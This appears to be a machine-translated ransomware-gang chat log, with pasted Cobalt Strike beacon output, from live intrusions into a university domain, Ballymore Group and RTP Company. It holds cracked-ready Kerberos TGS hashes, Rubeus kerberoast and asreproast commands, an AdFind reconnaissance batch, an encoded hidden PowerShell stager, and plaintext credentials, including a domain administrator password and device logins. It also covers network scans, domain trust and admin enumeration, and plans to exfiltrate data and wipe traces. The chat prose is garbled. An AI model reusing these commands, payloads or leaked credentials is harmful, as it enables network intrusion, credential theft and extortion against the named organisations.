Hash : $krb5tgs$AgpmServer/itstestagpm1.itstest.ad/itstest.ad:F36D0ED4DAD5337B355F1
                       799B1427DCE$AFC717D0BC99ADE1B19A00A08514D3D2509980A20AA2D05FB2F50E7D7A8B479B
                       58C1E1BB63210A696E873E1ED529D2B4785D006DDAAACC1A0EA81760B7154509B730F3F51EAC
                       B6F19C08DF1D1F661987DFFD0CD355259527BAD8B5B5236E635C3ACBCD535F14ACFEE4C07B27
                       BA701059DFF0D164F720AC83B0EFD794C41AC644B500D35FE40E3160EAAE778ABDFB2BB25220
                       5C861D689CCB16F5507433C3850461BD5B78D7833F716DE6173ADE9FC7A695B276F69002690F
                       85D7F99F71363FADC8AA09D5A64108DDF23BAAB01BE7D0F3CF84BEBF40001B2A0B83B61689D4
                       8831EB8B22174FD57CA2D6BBF5380244F37D3888B48906627123D955F9FB8A1C8ADB7EC365C5
                       239F07479B497AE5DDD13CB81908E117B6E2A3DD4A232276AAFA7D31E96718FE361358F3F96A
                       F4815509FAAA1E2BC6F55BB0D240B82C05F7B1F164589F6F36395DDAEA6F27B817A879D60814
                       EBD0AB159E7C73F8C43B17714145CFE29B2A35FFB7B516859C8B3810621BC82624313721A764
                       602AB009E9626D8FD3D6CF9CED5CD7CDB827C3E18E9DB463AA3C4508A950BF3A7C179BFC9998
                       A4986B4906AC320E5037D0DDC3F24D3879E3CF726A6AA3ACE75C3B91F1558035D7222DBDF8FD
                       E1E450BA001C4DB078F55BC88802CB13743730E8C62F075166442A54EEDE8754C3917F3ED042
                       B7B2E09413463F50CECB7C54766C9CCB407A6B47C817BC9A792ABA32822C9169B0AB720A7889
                       CE3E0966D26AC702A24D816BEA8A5BDEED2E5338445586E877D61FE1EED5FF8AB29D1F19EADB
                       0A56F3E2A565C53E06C6BE5F43AD498AF9ACB837D00EFC91989B5147BA7D02488FB6B4792F48
                       166DC02D1A7FB9D61E236B23B4872EA726DC95DD4657034569105167334B7200627AE7AFA71D
                       271E8D448BC7918B1D70FCD63442E2303DA1BBFB6AA16455DF1ECC827D821DB3271BEA2EF75D
                       30B6051E2CE32C1CBB15D4A161F3E69576D667FB6D9C9B443D3DB4EA64A253A6140B466CDF5E
                       F6DDD022E765CD7820DD6AA0247014A7E2EDC4AE1E878A5F9B18E72E41D5A2A761C58E023D89
                       8925694FCD5DA99C3144C061E33E52A8955B04FF0535CBBC02302CDDFC11D8BF83AA91D8EE01
                       C42477EB39C093A39ACDA4DEC3163F35974111A7A825E37E759CFC3F6A32FFCAEC257AC431B5
                       BC812F2E4DB5DE3EE85B94816C5ED40EB18EE85AE6680E08E97D72ADB603D9B7611FEB9406EF
                       EB0D3384BAA6BCFBEF4EA8124FA2C3D368B0E33A01E10E8E188FA76DDA33188330A38723291C
                       B598FC853236E35FED6676C8C29134581E89D072FD4E55EA119229111C0319ABF4A96E662EF6
                       AC855DBCAB73E33BF02D2DB245883788B05CEF1950A855640918443EF279AE3D74CBA29F1B59
                       D973AE398CAE2A8AC3A4D60989EDC6801C43048F5F7F9D5734A71E4B6E428CB55D8A55CF1103
                       F022DC53B6043AEE712D3F24679DC42F9B8DEFF767E1E6D22FE8824E17B70180F34C55F513FA
                       74AB8AD42D69438A9CBAFCEB77B22D38F64D9870B6ED8407FCFA0781F8768EC7692F28BC3B89
                       17240AC5AC389A8AF6001E1917D8088D14B102FCE13890B97797EA223C7C8740FC81B346E001
                       A567DC1BA4B7B2F26A49AA360A0C70F747693C99E7E9D1C393971662DA1DED0FA6E1FA1887AF
                       FA19958885222E490C03243F87D5A240119987548B61482E0AC527E4517220564D393ACE1B12
                       CF9F37FBE724653CE470E01ABDF2B386940CF284E9C028AFA3BBD6003AEABFD154F9861945BD
                       F1AE753DB8BDDDB16F0B9D4DA8A7D2CF08AB604CB49E0333573EFEF134268ABEEE9D8AD9009A
                       F3
SamAccountName : FIMAppPoolAcct
DistinguishedName : CN=FIMAppPoolAcct,OU=Service Accounts,DC=itstest,DC=ad
ServicePrincipalName : AgpmServer/itstestagpm1.itstest.ad/itstest.ad

TicketByteHexStream :
Hash : $krb5tgs$MSSQLSvc/itstestsql.itstest.ad:1433:0861B1ED986D8F5AA3F58217239AD6F
                       9$03246E66B21880706218CE9CFD8C8E00B41EA1C5E50328EBF95C81534D57D044D9BD85B548
                       6424FECB32BFE5E99A0A64E5BF1BC94D30F3C9B68C8EA2C92F1D5911348D59225B76565F76CD
                       02CB3EA4AD338CE03675A10A753284B8328081F8171C8F2CF5013D9CC7AD8A8E1C15F9B8EF31
                       2C1BD51E95B0FF011A17D53529A6054B55CE9DD46DCC7A20C937D67EDD1D430C007FAFABBE56
                       F8CD1CD8602496B2835E963D8396950808602D6099860A42EED104D420D4EBB8F31FE7DA6742
                       AB98354CC1D1CAAC3E4282B0BE33EEE459BCFE2AAFD7E8DFF35CC55229DBC62AA1C20F956395
                       1C0B3E207AA1B5380B1C1079A308A222896D44F8ACECAF1F8CE54E940F40EA9E24F34441D548
                       7FF45AE630EDA0EF78007828FEA99994D48D7657D94AF02FBD238C452EEDBB5567630F1D4640
                       B600FCBF238DB73679813EABBA0EECB7BF16466986B0E1A01BB736C7263B62AF675A2B3543D8
                       F4D4A5536FDC65C50B81FC25F2561B3761C91887255172E0F2A636EF5F7713D338082B8834A9
                       B44653813303DDFA9ECFE56BA2E86119683617A01E01D3A37AC35BF7969976E1B18B2AC24859
                       CFA53142E4ECB44AA9BD5FBF3FEEC8FCAF6F980BE7E279698A54B779D791EC336A224B72F574
                       4FB1957D9315C52DDD7DB52B4E4FF53F6AE7AEBCA41648D4C280B612B42D9C51B522F3B45C52
                       9DD08184D0A28AE5D858F1DA8D9DDB98F683BDA2472748FF03B78A16C2578ED51248022D23F7
                       CDB193BD35CF1CFC9BCF8E4D661E9808E887BC58A277E4638E31A5E05E07F7C365AC21C19464
                       06350BB301822C7FA27F3898F0F3EF0E6C9F8EB37CE1BFB5C42FC218C37BD19997EA420096EE
                       B8115D03718A9CBE86509EB0DE649E871EBD2127E165D1721216E6AFC5A067A8435E555C98A7
                       76D5EACA0308CF3E9A95A9F9C8CDD404B692BAD1062B6099AA4610026EADF3ED78F279456573
                       00246D5C804F1AE087D5E6955027D4FB36B43DCFDF66A135971AF3E6E0C2A469AEA8BC2DF816
                       CB919D8C24FEEFA9BD6B34AE078AA267945D667EACB2988DBC513B9346D38ED61F97D9CCB4B8
                       FC5F3789E5E7ACA2301BE8447ED3FF405446EFC729B3A6BC283A9420E9CC9C6C19C5FB61ABF3
                       41D1F9F7142D7225F5F4A57D4A50AFF1EACBC95801772D88571A8F35FB48DD857A7B53BDF224
                       1225BBD2B9A9F7BA3C4BC1B44710FB2199136E1F0D9616C42369FE9107C0D65DB66603513925
                       FBB37704550858012D53762239E38B668DB30744810B2852A8479CFA6D2DA14811D4ABBA7F7A
                       BF9F514BDE6AB9B483A2743D4384D9C878E9FC0FE0BA79B30673608129EF90FEFC7257CB34EF
                       E13A562E014517B622F9FF56339B8A4F37207193323E7904CC942A0FC5775D1407E3DDC4C206
                       E94346AC7798307556831413F5882883A7421090127EEA615FFA945291CA55D465328CB35181
                       EA37ACAF6E51F552174A20710540190E0E03A9BADBCECDCEAD95D59A8E56C7672B4FA69D2AED
                       1A07DE0B3CAE47D7E073A237F375D8C522F2962210B244C54683C37D587F19E6735E7F9E45C4
                       FD23422E9BA91ABBEF8AD3D9AB17DCE8496255467C65F1C8AE2E8A432F705A5DAD3D2C8328E1
                       A0BAC7C7417395DD68D4462C8A54AF4E0D1110E0CAFB65D53412A8FDA30A9EE603F0EEA6BB3F
                       DADE9B82B4CE3193FEF11A8618C9FB7CE4B352E73CC07259B0EAD6E4F405971579185607F372
                       A745C06B991DB27BA0F6C32B3E3717F45F8510699ABB5E3E2BF341111C235A66FE41CC1D4F1C
                       098B142E8BCD36D5F88770F6693185F6AB9EA8A89AC2A886683F66A84C3C8AA46989
SamAccountName : Administrator
DistinguishedName : CN=Administrator,OU=SysAdmins,OU=UNFUsers,DC=itstest,DC=ad
ServicePrincipalName : MSSQLSvc/itstestsql.itstest.ad:1433
``rubuus only kerberost in the trust under number 0 he trusts himself)``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
``What is he doing in the trusts?[ ](https://mediaeveryone.com/group/unf-edu?msg=wYaqe7ar8HXNYkafK) under number 3 the current domain is tripped he only took from it as I see it from the toolchain did he poll the kerbs from all? while he is poking around in other domains? did not poll them with adfind ?xp one dead2003 not five, alive only thiswin 2008
```
beacon> shell ping PHONEBILLING.unfcsd.unf.edu
[*] Tasked beacon to run: ping PHONEBILLING.unfcsd.unf.edu
[+] host called home, sent: 63 bytes
[+] received output:

Pinging PHONEBILLING.unfcsd.unf.edu [139.62.201.87] with 32 bytes of data:
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128
Reply from 139.62.201.87: bytes=32 time<1ms TTL=128

Ping statistics for 139.62.201.87:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``Thank you+have+extracted``.
/home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe
```
are you sure you have the right file here? uhhhh here's the Toulchain Invokerberost[ ](https://mediaeveryone.com/group/unf-edu?msg=pQ3pis2485fxQ3AcY) well here's the Toulchain file with your hands ``
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)

Please give me the full log with the manual start and the toolchain startup.
```
[*] cd C:\ProgramData\
[+] host called home, sent: 23 bytes
[-] File /home/user/Desktop/cobalt/Signature_Tools/toolchain/modules/HPE/Rubeus/Rubeus.exe is not a process assembly (.NET EXE)

``@user8 did you know you can kerberoast trust domains?
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
[+] host called home, sent: 318171 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[X] No users found to Kerberoast!
[*] Roasted hashes written to : C:\ProgramData\hashes.txt
```
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
[+] host called home, sent: 318127 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : unfcsd.unf.edu

[*] Searching path 'LDAP://doc2.unfcsd.unf.edu/DC=unfcsd,DC=unf,DC=edu' for AS-REP roastable users

[X] No users found to AS-REP roast!
[*] Roasted hashes written to : C:\ProgramData\asrephashes.txt

``GPPP:
```
[RESULT] Username: student
[RESULT] Changed: 2013-11-19 17:00:59
[RESULT] Password: 1510
```
```
[RESULT] Username: Presenter
[RESULT] Changed: 2011-06-27 18:57:56
[RESULT] Password: presenter
```
```
[RESULT] Username: Podium
[RESULT] Changed: 2015-08-21 18:42:19
```
```
[RESULT] Username: student
[RESULT] Changed: 2017-04-07 13:46:59
[RESULT] Username: cislocal
[RESULT] Changed: 2017-04-07 13:47:25
If you don't see cmd then you can't see the output of 7za it works within the parent process cmd7za console app I wonder if on the target machine 7za.exe works in the background or a window appears? otherwise take it and delete it as usual or take the harddack from them if you want to do a silent delete with overwriting) and is it silent?when i clean it, will it ever get deleted? i mean, will it ever get deleted? will it ever get deleted? archive it and take it away)) 505 megabytes of it, it's probably just a fat hell or netschek pshell adFind.bat
adfind.exe -f "(objectcategory=person)" > ad_users.txt
adfind.exe -f "objectcategory=computer" > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet)> subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > trustdmp.txt
``adfind through the batek startup already, I was looking to finish the sitinfo or not through the type where the shell, execute, etc.dd handy to remove, it came out:
```
C:\ProgramData>adfind.exe -f "(objectcategory=person)" 1>ad_users.txt

AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015
```
and so far is silent
ad_users.txt - 0 bytes ``.
beacon> net domain_trusts
[*] Tasked beacon to run net domain_trusts
[+] host called home, sent: 104513 bytes
[+] received output:
List of domain trusts:

    0: ITSTEST itstest.ad
    1: UNFMAN unf.man
    2: ADROOT unf.edu (Forest tree root) (Direct Outbound) (Direct Inbound)
    3: UNFCSD unfcsd.unf.edu (Forest 2) (Primary Domain) (Native)
``also please net domain_trusts``.
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DOC1 139.62.200.188
 DOC2 139.62.200.189
 DOC4 139.62.200.191
 DOC3 139.62.200.190
 AZPDDC01 10.249.1.8
 AZPDDC02 10.249.1.9

beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
unfcsd.unf.edu
``DA:
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator donh donovanf
johns krist mikeh
ServiceAdmin
The command completed successfully.
```
LA:
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
CtxAppVCOMAdmin
UNFCSD\Domain Admins
UNFCSD\Nervief
UNFCSD\Server Admins
The command completed successfully.
```

EA:
```
The request will be processed at a domain controller for domain unfcsd.unf.edu.

The group name could not be found.

More help is available by typing NET HELPMSG 2220.
``in private, of course)is it for me? :point_right::point_left:is)what do you say there is a clean coba?) at 21550 stalled and has been standing for about 10 minutespererozhdaya at 21956 stopped :/you have output for a few meters long loading in the coba restart still? column last not updated now cobalt itself suspend 3 and kill one in the first is crashed in bacon adfind
the second doesn't give the output work the second + so you have 2 sessions? exit will help, no? i have to kill all jobs at once i can't see the list of jobs even[ ](https://mediaeveryone.com/group/unf-edu?msg=WRkZc2uEaZ4wdmyvw) well this one kills one by one ls while not that pwd in the second session output appeared all jobs at once kill or `jobs -K`?does not work like in the msf `jobkill -K `but the session did come[ ](https://mediaeveryone.com/group/unf-edu?msg=eZuMneNTDBvSMrxDH) here's the second session, will it lag? closed the kmd and it disappeared at one point appeared near the file LockFile still? i called kmd through a shortcut i think just lag hell because the adfind pours in biconna mbd somewhere on fv cut off your domain spalili and started me to shove their adfind? xd when the bicon receives commands and does not give anything and lags horribly most likely spalili even in bicon does not go silent her lsona silent her pwd she does not output anything made another session i did a copy through the pkmya no jobs output in the session can not, nothing because i have to use pkma it actually looks like this on the screenshot i made ktrl+a and copyinbicon it prints adfindcockxxxxx` ``
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWABhADIALwBpAFMAaABMADkAbgBQAHcASwBmAHgAZwBKADAAQgBCAGsAbgBrAG4AdQBLAHQASQAxAFkAQgBNAGUATgB1AEEASABZAE8AZABHAGsAYgBFAGIAYQBOAHgAKwAwAEwAYgBCAGMATwAvADkANwAxAHQAdABJAEoAUABaAHkAZQB5AE8AdABMAHUAUgBrAEwAdgB0AHEAcQA3AFQAcAAwADkAVgBWAHoAUwBVADMARwBrAEoAeABVADQAaQBoAHkANwBpADcAbQBhAEkAeABqAGcATQB1AE4AcgB0ADcAUwBvAE4AbgBJAFMATgAyAGUAQgB0AGoAWgBLADMAaQBJAGIATwBtACsAMgA2AEYATQBVAHgAOQArAGYAdAB6AGMAUwBtAHQAcwA4AFYAdgArAHgAdAArAHUAYQBIAGIAawBwAFEAbQBjAHMAbgB6AEIAQwA1AEsAVQBXAGwAbQA1AHYAYgBtAC8AeABWAEcAcwBUADIAQwByADAARgBkAG8ATAAzADYATQAxAEgAeQBTAFoAMABZACsANgBKAEsANwA0AEkAVQBkAFEATgBmAFIAcwBIAHIANwAvADkAMQBrAGsAcABSAFUARgB5AG4AbABkADYASwBCAEgAaQBHAFAAbABMAGcAbABGAGMATABIAEYALwBjAGYATQBOAG8AdQBoAHUAdgBOAHcAaQBKACsASAArADUATAA2ADgAVgBYAG8AawBYAE4AcgBrAFkAbgBiAHMAMgBNADQARwBkAGkARQBFAEwAdgBzADIAQwBoADIAYgA3AGEAQwBpAFIAUQBRAG4A
``bicon log output please attach with this problemWhy does it do this is not very clearThe output is normal in bicon shortly output hell was downloaded - 150 bytes archive and 0 bytes folder inside only wrote off and livelyanu magic ran addition from the toolchain and the session hung for 2 minutes already `` ``
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
``c$c$non-printers didn't exist at all``.
192.0.2.117:445 (platform: 500 version: 4.9 name: PREMIERNEW domain: WORKGROUP)
192.0.2.214:445 (platform: 500 version: 6.1 name: TV-BALLY-S4P10 domain: WORKGROUP)
 
192.168.3.206:445 (platform: 500 version: 2.0 name: KM89B642 domain: KM-NetPrinters)
192.168.3.202:445 (platform: 500 version: 2.0 name: KM8FD05B domain: KM-NetPrinters)
192.168.3.204:445 (platform: 500 version: 2.0 name: KM892613 domain: KM-NetPrinters)
``https://login.veeam.com/tarnold Canary5500``
192.0.2.3:443
192.0.2.3:80
- us
Username : admin
Password : -6&J{*n]e73e]Mm

192.0.2.1:443
192.0.2.1:80
- VMWare ESXi
tried the nasa crescendos
First - Connection to ESXi host timed out
Then - Cannot complete login due to an incorrect user name or password.




192.0.2.213:443
192.0.2.213:80
192.0.2.213:22 (SSH-2.0-OpenSSH_7.9)
- ASRockRack IPMI
web gui system monitoring
Username : admin
Password : admin




192.0.2.248:443
192.0.2.248:80
192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1)
- iLO 4 ProLiant HP, tab "iLO: Bally44Backup-iLO.ballymoregroup.local"
However, the Ping request could not find host Bally44Backup-iLO.ballymoregroup.local. Please check the name and try again.

192.168.3.162:443
192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1)
- iLO 5 ProLiant host is ILOCZ292107HT.ballymoregroup.local
Ping request could not find host ILOCZ292107HT.ballymoregroup.local. Please check the name and try again.



192.168.15.158:80
- IIS Windows Server

192.0.2.99:80
- IIS Windows Server

192.0.2.246:80
- IIS7



192.168.3.202:443
- kyocera printer scanner

192.168.3.207:443
- HP DesignJet T1600 Printer

192.0.2.243:8080
192.0.2.243:443
192.0.2.243:80
- HP DesignJet T2530 PostScript printer

192.168.3.201:443
- printer
hp LaserJet 4200



192.0.2.214:443
192.0.2.214:80
- tab "TV-BALLY-S4P10 - Control Page", link "https://7bj6wypy6p.dattolocal.net/login",
Portal based login is enabled for this device. In order to access this device, you must have a Datto Partner Portal account.
The Portal-Login button redirects to "https://auth.datto.com/login".
Checked YES with domain @, it didn't go through.




192.0.2.27:80
- Schneider Electric is a European multinational company providing energy and automation digital solutions for efficiency and sustainability.
It addresses homes, buildings, data centers, infrastructure and industries, by combining energy technologies, real-time automation, software and services.
No Credits




192.168.3.161:443
- asks for username and password on the fly



10.0.180.254:8080
10.0.180.254:443
- WatchGuard
https://10.0.180.254/sslvpn_logon.shtml




192.168.3.21:443
- VIA Collaboration Hub
With any laptop or mobile device, VIA wireless presentation and collaboration solutions let meeting participants share any size file,
edit documents together in real time, turn the main display into a digital whiteboard, chat with other users, and stream full uninterrupted HD video (up to 1080p60).
Two buttons, Run and Install, both suggest downloading the software











192.0.2.117:22 (SSH-2.0-OpenSSH_5.3)
192.0.2.105:22 (SSH-2.0-dropbear)
192.0.2.71:22 (SSH-2.0-dropbear)
192.0.2.59:22 (SSH-2.0-dropbear)
192.0.2.50:22 (SSH-2.0-dropbear)
192.0.2.48:22 (SSH-2.0-dropbear)
192.0.2.39:22 (SSH-2.0-dropbear)
192.0.2.24:22 (SSH-2.0-dropbear)
192.0.2.15:22 (SSH-2.0-OpenSSH_4.3)
192.0.2.9:22 (SSH-2.0-dropbear)
192.0.2.4:22 (SSH-2.0-dropbear)
192.168.72.100:22 (SSH-2.0-dropbear)
192.168.72.77:22 (SSH-2.0-dropbear)
192.168.72.55:22 (SSH-2.0-dropbear)







192.0.2.250:443
192.0.2.250:80
192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX)
- did not open, the tab in the browser is called "Document Moved"

192.0.2.242:443
192.0.2.242:80
- failed to open

192.0.2.237:80
- did not open, "TDSi Ethernet to Serial Module" tab

192.0.2.235:443
192.0.2.235:80
- failed to open

192.0.2.234:443
192.0.2.234:80
- did not open
--- Chromium Credential (User: nreid) ---
URL : http://192.0.2.234/wcd/login.cgi
Username :
Password : 1234567812345678

192.0.2.233:443
192.0.2.233:80
- failed to open

192.0.2.232:80
- did not open, "TDSi Ethernet to Serial Module" tab

192.0.2.230:443
192.0.2.230:80
- failed to open

192.0.2.222:443
192.0.2.222:80
- failed to open

192.0.2.219:80
- does not open all the way, "Hewlett Packard" tab, blue panel on the left with the hp logo

192.0.2.191:80
- Hewlett Packard tab
did not open

192.0.2.190:443
192.0.2.190:80
- failed to open

192.0.2.95:8080
- it didn't open

192.168.3.206:443
- failed to open

192.168.3.204:443
- failed to open

192.168.3.130:443
- failed to open

192.168.15.252:80
- did not open, "NETGEAR" tab

192.168.15.251:80
- did not open, "NETGEAR" tab

192.168.15.206:443
192.168.15.206:80
- it didn't open

192.168.15.106:80
- didn't open

192.168.72.200:443
192.168.72.200:80
- it didn't open

192.168.72.158:80
- didn't open

192.0.3.10:80
- it didn't open

10.0.180.4:443
10.0.180.4:80
- did not open
``Entry : g84.p4.webrootcloudav.comhttps://www.webroot.com/us/en```
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!?
``I haven't run into this suite in general, it doesn't matter, if there is it must be with doppelgänger averländernen in filtrechek malware alerte in video logger voor voor aletztige logiweb gui monitoring systema voor dezeen nowsoxx voor dezeen, give me a screenshot of it```.
https://en.wikipedia.org/wiki/Intelligent_Platform_Management_Interface
``Give me a link@tl1 @tl2
Have not encountered IPMI? What is this thing? ``Scanner module is complete````
10.0.180.254:8080
10.0.180.254:443
10.0.180.4:443
10.0.180.4:80
``````
192.0.3.10:80
``````
192.168.72.200:443
192.168.72.200:80
192.168.72.158:80
192.168.72.100:22 (SSH-2.0-dropbear)
192.168.72.77:22 (SSH-2.0-dropbear)
192.168.72.55:22 (SSH-2.0-dropbear)
``````
192.168.15.252:80
192.168.15.251:80
192.168.15.206:443
192.168.15.206:80
192.168.15.158:80
192.168.15.106:80
``````
192.168.3.207:443
192.168.3.206:443
192.168.3.204:443
192.168.3.202:443
192.168.3.201:443
192.168.3.162:443
192.168.3.161:443
192.168.3.130:443
192.168.3.21:443
192.168.3.162:22 (SSH-2.0-mpSSH_0.2.1)
``````
192.0.2.250:443
192.0.2.250:80
192.0.2.248:443
192.0.2.248:80
192.0.2.246:80
192.0.2.243:8080
192.0.2.243:443
192.0.2.243:80
192.0.2.242:443
192.0.2.242:80
192.0.2.237:80
192.0.2.235:443
192.0.2.235:80
192.0.2.234:443
192.0.2.234:80
192.0.2.233:443
192.0.2.233:80
192.0.2.232:80
192.0.2.230:443
192.0.2.230:80
192.0.2.222:443
192.0.2.222:80
192.0.2.219:80
192.0.2.214:443
192.0.2.214:80
192.0.2.213:443
192.0.2.213:80
192.0.2.191:80
192.0.2.190:443
192.0.2.190:80
192.0.2.99:80
192.0.2.95:8080
192.0.2.27:80
192.0.2.3:443
192.0.2.3:80
192.0.2.1:443
192.0.2.1:80
192.0.2.250:22 (SSH-2.0-OpenSSH_6.2 PKIX)
192.0.2.248:22 (SSH-2.0-mpSSH_0.2.1)
192.0.2.213:22 (SSH-2.0-OpenSSH_7.9)
192.0.2.117:22 (SSH-2.0-OpenSSH_5.3)
192.0.2.105:22 (SSH-2.0-dropbear)
192.0.2.71:22 (SSH-2.0-dropbear)
192.0.2.59:22 (SSH-2.0-dropbear)
192.0.2.50:22 (SSH-2.0-dropbear)
192.0.2.48:22 (SSH-2.0-dropbear)
192.0.2.39:22 (SSH-2.0-dropbear)
192.0.2.24:22 (SSH-2.0-dropbear)
192.0.2.15:22 (SSH-2.0-OpenSSH_4.3)
192.0.2.9:22 (SSH-2.0-dropbear)
192.0.2.4:22 (SSH-2.0-dropbear)
``on the forum access is closedDrop user1 everywhere + change the pass in the general resources, his coba will be closed within 2 hoursI thought I was going to the wrong forum)) oops fucked up, already raised) and what domain? It is lying) why? yes, so good that now themselves on the forum do not get) @user1 account on the forum and everywhere else is closed? Maybe less detects than the current active, or additional functionalityI have not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports.Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would ususer1 does not work with us.I have you offlineWhat do you mean where? Where is @user1 @user3?
https://www.youtube.com/watch?v=OvESADFx2eEСхема remote MITM attack on WSUS system
https://www.securitylab.ru/analytics/479780.phpuser9Добрый dayquotqqhintproblemswithcryptamineswasn't scheduledtodaywhat's up?
List of domain trusts:
    0: WINONA winona.rtpco.local (Forest 2) (Direct Outbound)
    1: ALLOY us.alloypolymers.com (Direct Outbound) (Direct Inbound)
    2: RTPCO rtpco.local (Forest tree root) (Primary Domain) (Native)
```

contiguous YES between RTPCO and ALLOY:
```
cancelet
sagert
```
there is no contiguous YES with WINONA there may be contiguous info than you entered the trust you can poke what is left you have data from the trust
Group name Enterprise Admins
Comment Designated administrators of the enterprise
System error 8519 has occurred.

A global group cannot have a cross-domain member.

``````
Get list of DCs in domain 'rtpco.local' from '\\HendDC1.rtpco.local'.
     MNDomain6.rtpco.local [DS] Site: Winona
       HendDC1.rtpco.local [DS] Site: Henderson
         TXDC2.rtpco.local [DS] Site: texas
         TXDC1.rtpco.local [DS] Site: texas
       HendDC2.rtpco.local [DS] Site: Henderson
         VADC2.rtpco.local [DS] Site: VA
         VADC1.rtpco.local [DS] Site: VA
         MXDC2.rtpco.local [DS] Site: Mexico
         MXDC1.rtpco.local [DS] Site: Mexico
      ShenzDC1.rtpco.local [DS] Site: China
       SingDC1.rtpco.local [DS] Site: Singapore
      ShenzDC2.rtpco.local [DS] Site: China
     SuzhouDC1.rtpco.local [DS] Site: Suzhou
     SuzhouDC2.rtpco.local [DS] Site: Suzhou
     FranceDC1.rtpco.local [DS] Site: France
     FranceDC2.rtpco.local [DS] Site: France
    GermanyDC1.rtpco.local [DS] Site: Germany
    GermanyDC2.rtpco.local [DS] Site: Germany
         INDC2.rtpco.local [DS] Site: Indy
     DC1Poland.rtpco.local [DS] Site: Poland
     DC2Poland.rtpco.local [DS] Site: Poland
         NVDC1.rtpco.local [DS] Site: Nevada
      OrangeDC.rtpco.local [DS] Site: Orange
         MNDC2.rtpco.local [PDC] [DS] Site: Winona
       INDYDC1.rtpco.local [DS] Site: Indy
    CrocketDC1.rtpco.local [DS] Site: Crocket
     PolandDC1.rtpco.local [DS] Site: Poland
          OHDC.rtpco.local [DS] Site: Ohio

``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator arobinsona cancelet
kaseyaservice O365Service sagert
spicescan
``rtpcompany.com dats amaizing joni)eee
beacon> shell dir \\89.0.192.165\C$
[*] Tasked beacon to run: dir \\89.0.192.165\C$
[+] host called home, sent: 52 bytes
[+] received output:
 Volume in drive \89.0.192.165\C$ has no label.
 Volume Serial Number is FC6D-43E6

 Directory of \89.0.192.165$

03/12/2018 03:08 PM 1,523 cdata.log
01/04/2021 10:27 AM <DIR> kworking
08/22/2013 09:52 AM <DIR> PerfLogs
12/26/2020 04:18 PM <DIR> Program Files
05/22/2019 04:39 PM <DIR> Program Files (x86)
01/01/2021 09:00 AM <DIR> Temp
09/19/2018 09:59 AM <DIR> Users
12/26/2020 04:18 PM <DIR> Windows
               1 File(s) 1,523 bytes
               7 Dir(s) 63,537,639,424 bytes free
``Check with the admin on the server skul''.
Global Group memberships *VSA_Admins *Test_Alloy
                             *IT *SQL Server Admins
